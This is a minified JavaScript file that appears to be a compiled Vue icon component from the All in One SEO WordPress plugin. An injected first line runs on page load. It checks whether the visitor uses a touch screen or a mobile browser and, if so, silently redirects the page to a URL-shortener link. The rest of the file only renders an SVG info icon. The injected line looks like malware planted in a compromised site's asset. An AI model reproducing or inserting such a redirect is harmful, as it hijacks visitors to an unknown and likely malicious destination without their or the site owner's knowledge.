(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{_ as t}from"./_plugin-vue_export-helper.eefbdd86.js";import{f as r,i as s,j as o}from"./vendor-vue-ui.232c7c36.js";const e={},c={viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg",class:"aioseo-info"};function a(l,n){return r(),s("svg",c,[...n[0]||(n[0]=[o("path",{d:"M0 0h24v24H0V0z",fill:"none"},null,-1),o("path",{d:"M11 7h2v2h-2zm0 4h2v6h-2zm1-9C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm0 18c-4.41 0-8-3.59-8-8s3.59-8 8-8 8 3.59 8 8-3.59 8-8 8z",fill:"currentColor"},null,-1)])])}const p=t(e,[["render",a]]);export{p as S};
